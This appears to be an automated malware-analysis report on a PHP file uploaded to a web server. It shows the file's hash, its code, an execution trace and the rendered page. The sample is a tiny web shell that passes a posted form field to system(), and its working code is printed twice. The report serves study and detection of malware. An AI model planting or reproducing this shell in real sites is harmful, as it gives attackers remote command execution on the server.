PHP Malware Analysis

00000000ax.php

md5: 7a1ab1d7689367b5a49be7ad6809c572

Jump to:

Screenshot


Attributes

Execution

Input

Title


Deobfuscated PHP code

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>

<body>


    <form method="post">
        <input type="text" name="cm">
        <button type="submit">Submit</button>
    </form>


    <pre>
<?php 
if (isset($_POST['cm'])) {
    system($_POST['cm']);
}
?>

</pre>


</body>

</html>

Execution traces

data/traces/7a1ab1d7689367b5a49be7ad6809c572_trace-1676260304.8117.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:52:10.709605]
1	0	1	0.000329	393528
1	3	0	0.000397	394880	{main}	1		/var/www/html/uploads/00000000ax.php	0	0
1	3	1	0.000419	394880
			0.000447	314240
TRACE END   [2023-02-13 01:52:10.709854]


Generated HTML code

<html lang="en"><head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>

<body>


    <form method="post">
        <input type="text" name="cm">
        <button type="submit">Submit</button>
    </form>


    <pre>
</pre>




</body></html>

Original PHP code

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>

<body>


    <form method="post">
        <input type="text" name="cm">
        <button type="submit">Submit</button>
    </form>


    <pre>
<?php

if (isset($_POST['cm'])) {
    system($_POST['cm']);
}

?>

</pre>


</body>

</html>